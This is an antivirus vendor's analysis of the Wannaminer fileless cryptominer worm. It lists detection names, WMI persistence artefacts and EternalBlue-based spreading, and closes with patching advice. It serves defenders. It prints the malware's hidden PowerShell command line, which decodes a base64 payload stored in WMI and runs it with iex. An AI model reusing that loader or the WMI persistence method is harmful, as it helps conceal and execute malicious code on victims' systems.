Trojan.Win32.Wannaminer.a

General explanation

Type: Miner

Degree of destruction: high

Prevalence: high

Used Vulnerability: MS17-010 Exploit

Name:

• WMI.BAT.wannaminer (Padvish)
• NetWorm.Win32.Wannaminer (Padvish)
• Trojan:Win32/CoinMiner (Microsoft)
• Win32/CoinMiner.BWS (Eset)

What is a Miner?

Miners are individuals or software that extracts cryptocurrencies or mining them. Bitcoin is a type of cryptocurrency. Extracting bitcoin is a kind of data confirmation that performs in two difficult stages of the SHA256 hash. Bitcoin network rewards extractors with bitcoin for their attempts to calculate complex and complex calculations. Malware writers write malware to use the victim’s system to mine bitcoin and pay no price for these calculations. Calculating these calculations will involve the CPU of the victim’s system and slow the system.

What is Wnnaminer malware?

This malware is a subset of bitcoinminer malware that extracts cryptocurrencies by malicious scripts and, at the same time, can distribute itself through the network. It will not place any file of itself on the victim’s system, and it will restore all scripts after download and executes them. Consequently, this malware is Fileless malware.

Technical Explanation

Sings of infection

  • A task is related to the systupdater0.bat file in the task scheduler of some systems. Also, this malware will place maintenance for itself in the following path by creating a class named systemcore_Updater* and some instances with the names of SCM Event* Log Consumer and SCM Event* Log Consumer*:
    • WMIC:\\.\ROOT\DEFAULT:systemcore_Updater*
    • WMIC:\\.\ROOT\subscription:CommandLineEventConsumer.Name="SCM Event* Log Consumer"
    • WMIC:\\.\ROOT\subscription:CommandLineEventConsumer.Name="SCM Event* Log Consumer*"

The following image is the mof object contents of SCM Event* Log Consumer:

Also, the following image is the permanence of the malware which is placed in the wmi:

This malware used wmi to execute PowerShell in the victim’s system and execute the related bitcoinminer scripts by it:

  • Powershell process in the current process list which has the command of connecting to bitcoin server
  • Powershell process in the current process list which has the command involves ambiguous codes with base64 algorithm.
  • Powershell process in the current process list which its input command is as follows:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:systemcore_Updater*').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:systemcore_Updater*').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

Explaining the action 

This is a file-less malware, and it places no files on the victim’s system and only restores all scripts in the RAM after download and executes them. However, the two obtained samples of files are from this malware which both will remove from the disk.

sysupdater0.bat file
This file build in the following path and by the network and the attacker:
[root]:\windows\temp\sysupdater0.bat
The content of this file is:
mue.exe
First, the following path creates this file:
%SystemDirectory%\mue.exe
Then it will connect to its remote server and extract bitcoin by executing the schtasks.exe file that is placed in the system32 folder and the hijack of this process. After infecting the schtasks.exe process, it will remove the mue.exe file.
The permanence procedure of this malware is that, once every 2 hours, it will download a bat file from its server, and it executes the malware in the victim’s system. This bat file will download a PowerShell file named in3.ps1. The malware use URLs arrays to download in3.ps1 or in6.ps1 that the in3 contents are obscured. Generally, files of this malware are obfuscated and turned into explicit code using base64 decoders, and the written decoding algorithms are in the middle of the program. This is the file that executes Eternalblue exploit code on systems that are in the network.
After the malware abuse the Eternalblue (MS17-010) vulnerability, it will create a backdoor on other clients connected to the network and start to send scripts related to Powershell, so executes them on the destination system.
A sample of sent scripts by the malware to the victim’s system is as follows:

How to deal with it and disinfect the system

Padvish Antivirus will detect this malware and disinfect its probable infections. It is recommended to use provided security patch MS17-010 by Microsoft, to prevent attacks that are using Eternalblue vulnerability. Padvish IPS will detect these attacks and prevent them from entering the system. Therefore, to prevent this infection install Padvish.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>